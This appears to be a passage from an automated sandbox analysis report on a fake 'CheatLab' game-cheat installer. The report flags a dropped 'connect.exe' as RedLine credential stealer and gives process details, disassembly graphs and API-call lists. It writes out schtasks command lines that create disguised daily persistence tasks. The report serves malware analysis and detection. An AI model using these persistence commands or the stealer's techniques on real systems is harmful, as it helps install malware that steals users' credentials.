                                                                                                                                                                                                                            Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                                                                                                                                                                                            Imagebase:0x7ff772380000
                                                                                                                                                                                                                            File size:1'159'194 bytes
                                                                                                                                                                                                                            MD5 hash:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:01:35:21
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:schtasks /create /sc daily /st 12:57 /f /tn ServerUpdate_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
                                                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:01:35:21
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:schtasks /create /sc daily /st 12:57 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
                                                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:01:35:21
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:01:35:21
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:01:35:22
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                                                                                                                                                                                                                            Imagebase:0x7ff6de450000
                                                                                                                                                                                                                            File size:1'159'194 bytes
                                                                                                                                                                                                                            MD5 hash:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:01:35:31
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                                                                                                                                                                                            Imagebase:0x7ff772380000
                                                                                                                                                                                                                            File size:1'159'194 bytes
                                                                                                                                                                                                                            MD5 hash:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:01:35:40
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                                                                                                                                                                                            Imagebase:0x7ff772380000
                                                                                                                                                                                                                            File size:1'159'194 bytes
                                                                                                                                                                                                                            MD5 hash:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:01:35:59
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:1'070'058'901 bytes
                                                                                                                                                                                                                            MD5 hash:A8A24AF1D9E83BE788BD28D64967FE32
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2400212842.00000000021F2000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2399412192.0000000000425000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:01:35:59
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:1.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:31.4%
                                                                                                                                                                                                                              Total number of Nodes:318
                                                                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                                                                              execution_graph 32609 603084 32610 603090 __FrameHandler3::FrameUnwindToState 32609->32610 32635 602de4 32610->32635 32612 603097 32613 6031ea 32612->32613 32621 6030c1 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 32612->32621 32669 6033a8 4 API calls 2 library calls 32613->32669 32615 6031f1 32670 612ed9 23 API calls __FrameHandler3::FrameUnwindToState 32615->32670 32617 6031f7 32671 612e9d 23 API calls __FrameHandler3::FrameUnwindToState 32617->32671 32619 6031ff 32620 6030e0 32621->32620 32625 603161 32621->32625 32668 612eb3 41 API calls 4 library calls 32621->32668 32623 603167 32647 5ecdb0 GetCommandLineW 32623->32647 32646 6034c3 GetStartupInfoW ctype 32625->32646 32636 602ded 32635->32636 32672 6035a9 IsProcessorFeaturePresent 32636->32672 32638 602df9 32673 6058dc 10 API calls 2 library calls 32638->32673 32640 602dfe 32645 602e02 32640->32645 32674 61393e 32640->32674 32643 602e19 32643->32612 32645->32612 32646->32623 32648 5ecdf8 32647->32648 32733 5e1f80 LocalAlloc 32648->32733 32650 5ece09 32734 5e69a0 32650->32734 32652 5ece58 32653 5ece5c 32652->32653 32654 5ece69 32652->32654 32826 5e6600 98 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 32653->32826 32742 5ec6a0 LocalAlloc LocalAlloc 32654->32742 32657 5ece65 32659 5eceb0 ExitProcess 32657->32659 32658 5ece72 32743 5ec870 32658->32743 32664 5ece9a 32827 5ecce0 CreateFileW SetFilePointer WriteFile CloseHandle 32664->32827 32665 5ecea4 32828 5ecec0 LocalFree LocalFree 32665->32828 32668->32625 32669->32615 32670->32617 32671->32619 32672->32638 32673->32640 32678 61bedb 32674->32678 32677 6058fb 7 API calls 2 library calls 32677->32645 32679 61beeb 32678->32679 32680 602e0b 32678->32680 32679->32680 32682 616d2d 32679->32682 32680->32643 32680->32677 32683 616d39 __FrameHandler3::FrameUnwindToState 32682->32683 32694 611c9a EnterCriticalSection 32683->32694 32685 616d40 32695 61c4cc 32685->32695 32688 616d5e 32710 616d84 LeaveCriticalSection std::_Lockit::~_Lockit 32688->32710 32691 616d59 32709 616c7d GetStdHandle GetFileType 32691->32709 32692 616d6f 32692->32679 32694->32685 32696 61c4d8 __FrameHandler3::FrameUnwindToState 32695->32696 32697 61c4e1 32696->32697 32698 61c502 32696->32698 32719 607370 14 API calls __dosmaperr 32697->32719 32711 611c9a EnterCriticalSection 32698->32711 32701 61c50e 32707 61c53a 32701->32707 32712 61c41c 32701->32712 32702 61c4e6 32720 607017 41 API calls ___std_exception_copy 32702->32720 32704 616d4f 32704->32688 32708 616bc7 44 API calls 32704->32708 32721 61c561 LeaveCriticalSection std::_Lockit::~_Lockit 32707->32721 32708->32691 32709->32688 32710->32692 32711->32701 32722 6170bb 32712->32722 32715 61c42e 32718 61c43b 32715->32718 32729 61776f 6 API calls std::_Locinfo::_Locinfo_Addcats 32715->32729 32716 61c490 32716->32701 32730 6153b8 14 API calls 2 library calls 32718->32730 32719->32702 32720->32704 32721->32704 32723 6170c8 std::_Locinfo::_W_Getmonths 32722->32723 32724 617108 32723->32724 32725 6170f3 RtlAllocateHeap 32723->32725 32731 61bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 32723->32731 32732 607370 14 API calls __dosmaperr 32724->32732 32725->32723 32726 617106 32725->32726 32726->32715 32729->32715 32730->32716 32731->32723 32732->32726 32733->32650 32736 5e69f2 32734->32736 32735 5e6a34 32737 602937 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 32735->32737 32736->32735 32739 5e6a22 32736->32739 32738 5e6a42 32737->32738 32738->32652 32829 602937 32739->32829 32741 5e6a30 32741->32652 32742->32658 32744 5ec889 32743->32744 32747 5ecb32 32743->32747 32745 5ecb92 32744->32745 32744->32747 32837 5e6250 14 API calls 32745->32837 32750 5e6a50 32747->32750 32748 5ecba2 RegOpenKeyExW 32748->32747 32749 5ecbc0 RegQueryValueExW 32748->32749 32749->32747 32751 5e6a84 32750->32751 32752 5e6aa3 GetCurrentProcess OpenProcessToken 32750->32752 32753 602937 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 32751->32753 32756 5e6adf 32752->32756 32757 5e6b09 32752->32757 32755 5e6a9f 32753->32755 32755->32664 32755->32665 32758 5e6af4 CloseHandle 32756->32758 32759 5e6b02 32756->32759 32838 5e5de0 32757->32838 32758->32759 32886 5e57c0 GetCurrentProcess OpenProcessToken 32759->32886 32763 5e6b2e 32767 5e6b3f 32763->32767 32768 5e6b32 32763->32768 32764 5e6b20 32766 5e1770 42 API calls 32764->32766 32765 5e6c29 32769 5e6ddb 32765->32769 32776 5e6c43 32765->32776 32766->32756 32841 5e5f40 ConvertSidToStringSidW 32767->32841 32770 5e1770 42 API calls 32768->32770 32891 5e2310 56 API calls 32769->32891 32770->32756 32774 5e6e04 32818 5e6f2d 32774->32818 32892 5e46f0 52 API calls 32774->32892 32943 5e2310 56 API calls 32776->32943 32778 5e6c57 32778->32818 32944 5e46f0 52 API calls 32778->32944 32782 5e6b85 32872 5e2e60 32782->32872 32785 5e6e59 32893 5e2310 56 API calls 32785->32893 32786 5e2e60 42 API calls 32789 5e6bf5 32786->32789 32878 5e1770 32789->32878 32790 5e6e29 32790->32785 32953 5e4ac0 42 API calls 3 library calls 32790->32953 32791 5e6e68 32791->32818 32894 5e46f0 52 API calls 32791->32894 32793 5e6cad 32946 5e2310 56 API calls 32793->32946 32797 5e6c16 FindCloseChangeNotification 32797->32759 32798 5e6c7c 32798->32793 32945 5e4ac0 42 API calls 3 library calls 32798->32945 32799 5e6cc7 32799->32818 32947 5e46f0 52 API calls 32799->32947 32802 5e6eb9 32895 5e2310 56 API calls 32802->32895 32805 5e6e8a 32805->32802 32954 5e4ac0 42 API calls 3 library calls 32805->32954 32806 5e6ec4 32806->32818 32896 5e46f0 52 API calls 32806->32896 32807 5e6d19 32949 5e2310 56 API calls 32807->32949 32810 5e6ce9 32810->32807 32948 5e4ac0 42 API calls 3 library calls 32810->32948 32811 5e6d24 32811->32818 32950 5e46f0 52 API calls 32811->32950 32814 5e6f10 32897 5e52f0 32814->32897 32817 5e6ee6 32817->32814 32955 5e4ac0 42 API calls 3 library calls 32817->32955 32956 5e11d0 RaiseException _com_raise_error 32818->32956 32819 5e6d70 32952 5e4ba0 158 API calls 3 library calls 32819->32952 32822 5e6d4e 32951 5e4ac0 42 API calls 3 library calls 32822->32951 32823 5e6d46 32823->32819 32823->32822 32823->32823 32824 5e6d8a 32824->32818 32826->32657 32827->32665 32828->32659 32830 602940 IsProcessorFeaturePresent 32829->32830 32831 60293f 32829->32831 32833 6029a5 32830->32833 32831->32741 32836 602968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32833->32836 32835 602a88 32835->32741 32836->32835 32837->32748 32957 5e5e40 GetTokenInformation 32838->32957 32842 5e5fac 32841->32842 32843 5e5fd2 32841->32843 32846 5e24c0 47 API calls 32842->32846 32844 5e24c0 47 API calls 32843->32844 32845 5e5fc9 32844->32845 32847 5e5ff5 LocalFree 32845->32847 32848 5e6003 32845->32848 32846->32845 32847->32848 32849 5e24c0 32848->32849 32853 5e24fd 32849->32853 32855 5e24d1 __Strxfrm 32849->32855 32850 5e25f5 32968 5e2770 42 API calls 32850->32968 32852 5e2515 32856 5e25f0 32852->32856 32857 5e2566 LocalAlloc 32852->32857 32853->32850 32853->32852 32853->32856 32859 5e2582 32853->32859 32854 5e25fa 32969 607027 41 API calls 2 library calls 32854->32969 32855->32782 32967 5e2d70 RaiseException _com_raise_error 32856->32967 32857->32854 32861 5e2577 32857->32861 32863 5e2586 LocalAlloc 32859->32863 32868 5e2593 __Strxfrm 32859->32868 32861->32868 32863->32868 32868->32854 32869 5e25e5 32868->32869 32870 5e25d8 32868->32870 32869->32782 32870->32869 32871 5e25de LocalFree 32870->32871 32871->32869 32873 5e2eb7 32872->32873 32874 5e2e8d 32872->32874 32873->32786 32874->32872 32875 5e2eaa 32874->32875 32970 607027 41 API calls 2 library calls 32874->32970 32875->32873 32876 5e2eb0 LocalFree 32875->32876 32876->32873 32880 5e179b 32878->32880 32883 5e17c1 32878->32883 32879 5e17ba LocalFree 32879->32883 32880->32879 32881 5e17b4 32880->32881 32882 5e17e5 32880->32882 32881->32879 32881->32883 32971 607027 41 API calls 2 library calls 32882->32971 32883->32759 32883->32797 32887 5e57e7 GetTokenInformation 32886->32887 32888 5e57e1 32886->32888 32889 5e581e CloseHandle 32887->32889 32890 5e5816 32887->32890 32888->32765 32889->32765 32890->32889 32891->32774 32892->32790 32893->32791 32894->32805 32895->32806 32896->32817 32898 5e5361 32897->32898 32972 5e5d30 32898->32972 32900 5e537b 32901 5e5d30 41 API calls 32900->32901 32902 5e538b 32901->32902 32976 5e59c0 32902->32976 32904 5e57b0 32992 5e11d0 RaiseException _com_raise_error 32904->32992 32906 5e539b 32906->32904 32984 607852 32906->32984 32910 5e53e1 32911 5e5d30 41 API calls 32910->32911 32923 5e53f5 32911->32923 32912 5e551d GetForegroundWindow 32942 5e5529 32912->32942 32913 5e55f7 ShellExecuteExW 32914 5e5609 32913->32914 32916 5e5612 32913->32916 32989 5e5890 6 API calls 32914->32989 32917 5e5646 32916->32917 32919 5e5625 ShellExecuteExW 32916->32919 32926 5e566c GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 32917->32926 32927 5e56fd 32917->32927 32918 5e5493 GetWindowsDirectoryW 32987 5e5b10 70 API calls 32918->32987 32919->32917 32921 5e563d 32919->32921 32990 5e5890 6 API calls 32921->32990 32922 5e54b4 32988 5e5b10 70 API calls 32922->32988 32923->32918 32929 5e54cc 32923->32929 32926->32927 32930 5e5698 32926->32930 32928 5e5721 32927->32928 32931 5e570e WaitForSingleObject GetExitCodeProcess 32927->32931 32991 5e5940 CloseHandle 32928->32991 32929->32912 32929->32942 32930->32927 32933 5e56a1 GetModuleHandleW GetProcAddress 32930->32933 32931->32928 32934 5e56fa 32933->32934 32935 5e56b4 32933->32935 32934->32927 32937 5e56ed 32935->32937 32938 5e56c8 Sleep EnumWindows 32935->32938 32936 5e572d 32939 602937 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 32936->32939 32937->32934 32940 5e56f3 BringWindowToTop 32937->32940 32938->32935 32938->32937 33062 5e5830 GetWindowThreadProcessId GetWindowLongW 32938->33062 32941 5e57a8 32939->32941 32940->32934 32941->32818 32942->32913 32943->32778 32944->32798 32945->32793 32946->32799 32947->32810 32948->32807 32949->32811 32950->32823 32951->32819 32952->32824 32953->32785 32954->32802 32955->32814 32958 5e5ebe GetLastError 32957->32958 32959 5e5e18 32957->32959 32958->32959 32960 5e5ec9 32958->32960 32959->32763 32959->32764 32961 5e5ed9 ctype 32960->32961 32962 5e5f0e GetTokenInformation 32960->32962 32963 5e5ee9 32960->32963 32961->32962 32962->32959 32966 5e60d0 45 API calls 3 library calls 32963->32966 32965 5e5ef2 32965->32962 32966->32965 32973 5e5d6e 32972->32973 32975 5e5d7d 32973->32975 32993 5e4a10 41 API calls 4 library calls 32973->32993 32975->32900 32977 5e59f8 32976->32977 32979 5e5a03 32976->32979 32978 5e5d30 41 API calls 32977->32978 32980 5e5a01 32978->32980 32982 5e5a1a 32979->32982 32994 5e2310 56 API calls 32979->32994 32980->32906 32995 5e5a60 42 API calls 32982->32995 32996 607869 32984->32996 32987->32922 32988->32929 32989->32916 32990->32917 32991->32936 32993->32975 32994->32982 32995->32980 33001 607078 32996->33001 33002 607096 33001->33002 33008 60708f 33001->33008 33002->33008 33046 6157cc 41 API calls 3 library calls 33002->33046 33004 6070b7 33047 615ab7 41 API calls __Getctype 33004->33047 33006 6070cd 33048 615b15 41 API calls std::_Locinfo::_W_Getmonths 33006->33048 33009 6076d9 33008->33009 33011 607709 ___crtCompareStringW 33009->33011 33014 6076f3 33009->33014 33013 607720 33011->33013 33011->33014 33012 6076f8 33050 607017 41 API calls ___std_exception_copy 33012->33050 33017 607702 33013->33017 33051 615c2a 6 API calls 2 library calls 33013->33051 33049 607370 14 API calls __dosmaperr 33014->33049 33019 602937 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 33017->33019 33018 60776e 33020 607778 33018->33020 33021 60778f 33018->33021 33024 5e53d3 33019->33024 33052 607370 14 API calls __dosmaperr 33020->33052 33022 607794 33021->33022 33023 6077a5 33021->33023 33054 607370 14 API calls __dosmaperr 33022->33054 33027 607826 33023->33027 33029 6077cc 33023->33029 33036 6077b9 __alloca_probe_16 33023->33036 33024->32904 33024->32910 33059 607370 14 API calls __dosmaperr 33027->33059 33028 60777d 33053 607370 14 API calls __dosmaperr 33028->33053 33055 615bdc 15 API calls 2 library calls 33029->33055 33032 60782b 33060 607370 14 API calls __dosmaperr 33032->33060 33035 6077d2 33035->33027 33035->33036 33036->33027 33038 6077e6 33036->33038 33037 607813 33061 602326 14 API calls ___vcrt_freefls@4 33037->33061 33056 615c2a 6 API calls 2 library calls 33038->33056 33041 607802 33042 607809 33041->33042 33043 60781a 33041->33043 33057 60b762 41 API calls 2 library calls 33042->33057 33058 607370 14 API calls __dosmaperr 33043->33058 33046->33004 33047->33006 33048->33008 33049->33012 33050->33017 33051->33018 33052->33028 33053->33017 33054->33012 33055->33035 33056->33041 33057->33037 33058->33037 33059->33032 33060->33037 33061->33017

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 005E52F0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 5e52f0-5e53a8 call 5e63a0 call 5e5d30 * 2 call 5e59c0 9 5e53ae-5e53bd 0->9 10 5e57b0-5e57ba call 5e11d0 0->10 11 5e53bf-5e53c7 call 5e49a0 9->11 12 5e53c9-5e53db call 607852 9->12 11->12 12->10 19 5e53e1-5e540a call 5e5d30 12->19 22 5e540c-5e540f 19->22 23 5e5414-5e5419 19->23 22->23 24 5e54cf-5e551b 23->24 25 5e541f-5e5429 23->25 27 5e551d-5e5526 GetForegroundWindow 24->27 28 5e5529-5e552b 24->28 26 5e5430-5e5436 25->26 29 5e5438-5e543b 26->29 30 5e5456-5e5458 26->30 27->28 31 5e55f7-5e5607 ShellExecuteExW 28->31 32 5e5531-5e5535 28->32 35 5e543d-5e5445 29->35 36 5e5452-5e5454 29->36 37 5e545b-5e545d 30->37 33 5e5609-5e5612 call 5e5890 31->33 34 5e5614-5e5616 31->34 38 5e5537-5e553e 32->38 39 5e5540-5e554c 32->39 33->34 42 5e5618-5e561e 34->42 43 5e5646-5e5666 call 5e5b30 34->43 35->30 44 5e5447-5e5450 35->44 36->37 45 5e545f 37->45 46 5e5493-5e54cc GetWindowsDirectoryW call 5e5b10 * 2 37->46 38->38 38->39 41 5e5550-5e555d 39->41 41->41 48 5e555f-5e556b 41->48 49 5e5625-5e563b ShellExecuteExW 42->49 50 5e5620-5e5623 42->50 66 5e566c-5e5696 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 43->66 67 5e56fd-5e5702 43->67 44->26 44->36 53 5e5464-5e546a 45->53 46->24 56 5e5570-5e557d 48->56 49->43 57 5e563d-5e5641 call 5e5890 49->57 50->43 50->49 54 5e546c-5e546f 53->54 55 5e548a-5e548c 53->55 60 5e5486-5e5488 54->60 61 5e5471-5e5479 54->61 63 5e548f-5e5491 55->63 56->56 62 5e557f-5e55f5 call 5e64a0 * 5 56->62 57->43 60->63 61->55 68 5e547b-5e5484 61->68 62->31 63->24 63->46 66->67 73 5e5698-5e569f 66->73 70 5e5704-5e570c 67->70 71 5e5721-5e5744 call 5e5940 67->71 68->53 68->60 70->71 75 5e570e-5e571b WaitForSingleObject GetExitCodeProcess 70->75 83 5e574e-5e5762 71->83 84 5e5746-5e5749 71->84 73->67 77 5e56a1-5e56b2 GetModuleHandleW GetProcAddress 73->77 75->71 80 5e56fa 77->80 81 5e56b4-5e56c1 77->81 80->67 89 5e56c3-5e56c6 81->89 86 5e576c-5e5781 83->86 87 5e5764-5e5767 83->87 84->83 90 5e578b-5e57af call 602937 86->90 91 5e5783-5e5786 86->91 87->86 93 5e56ef-5e56f1 89->93 94 5e56c8-5e56eb Sleep EnumWindows 89->94 91->90 93->80 98 5e56f3-5e56f4 BringWindowToTop 93->98 94->89 97 5e56ed 94->97 97->98 98->80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 005E549C
                                                                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 005E551D
                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 005E5601
                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 005E5637
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 005E567C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005E5685
                                                                                                                                                                                                                              • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 005E5688
                                                                                                                                                                                                                              • AllowSetForegroundWindow.USER32(00000000), ref: 005E568B
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 005E56AB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005E56AE
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 005E56CA
                                                                                                                                                                                                                              • EnumWindows.USER32(005E5830,?), ref: 005E56DF
                                                                                                                                                                                                                              • BringWindowToTop.USER32(00000000), ref: 005E56F4
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 005E5711
                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 005E571B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
